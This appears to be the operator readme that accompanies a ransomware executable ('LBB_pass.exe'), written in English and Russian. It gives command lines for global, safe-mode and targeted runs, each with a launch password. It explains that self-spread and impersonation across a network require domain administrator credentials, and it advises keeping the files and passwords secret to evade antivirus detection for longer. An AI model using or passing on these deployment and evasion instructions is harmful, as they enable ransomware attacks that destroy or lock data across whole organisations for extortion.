Important information!

When using Safe Mode it is obligatory to write the full path to the file.
It is not recommended to use the root of the system disk to run the file, since on some versions of Windows it is forbidden to run from there.
When using self-spread and impersonation, the files should be run with at least local administrator privileges on any computer on the network with a valid domain administrator login and password for the impersonation.
Don't leak files and passwords to run, this will help bypass anti-viruses for as long as possible.

Важная информация!

При использовании Safe Mode обязательно нужно прописывать полный путь к файлу.
Не рекомендуется использовать корень системного диска для запуска файла, так как на некоторых версиях Windows запуск оттуда запрещён.
При использовании самораспрастранения и имперсонации, файлы нужно запускать как минимум с правами локального администратора на любом из компьютеров в сети с актуальными логином и паролем администратора домена для имперсонации.
Не допускайте утечки файлов и паролей для запуска, это поможет обходить антивирусы как можно дольше.

### Global Mode:
LBB_pass.exe -pass 9e10321e9b3c695783aec5466c6a8c24

### Safe Mode:
LBB_pass.exe -safe -pass 9e10321e9b3c695783aec5466c6a8c24

### Target Mode:
LBB_pass.exe -path C:\file -pass 9e10321e9b3c695783aec5466c6a8c24
LBB_pass.exe -path C:\folder -pass 9e10321e9b3c695783aec5466c6a8c24
LBB_pass.exe -path C:\ -pass 9e10321e9b3c695783aec5466c6a8c24
LBB_pass.exe -path \\?\Volume{11111111-2222-3333-4444-555555555555}\ -pass 9e10321e9b3c695783aec5466c6a8c24
